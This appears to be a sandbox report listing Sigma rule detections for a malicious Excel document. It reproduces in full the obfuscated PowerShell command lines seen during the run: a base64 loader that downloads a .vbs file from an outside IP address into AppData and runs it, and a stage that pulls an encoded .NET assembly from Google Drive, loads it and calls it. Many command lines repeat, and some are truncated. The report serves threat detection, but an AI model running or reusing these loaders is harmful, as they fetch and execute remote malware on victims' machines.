IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3944, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe, ProcessId: 4056, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , ProcessId: 2836, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5k

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3944, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", ProcessId: 3316, ProcessName: csc.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3944, TargetFilename: C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 188.114.97.3, SourceIsIpv6: false, SourcePort: 443

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , ProcessId: 2836, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3944, TargetFilename: C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3556, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", CommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgI

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3944, TargetFilename: C:\Users\user\AppData\Local\Temp\mg20lqoj.r4c.ps1

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAg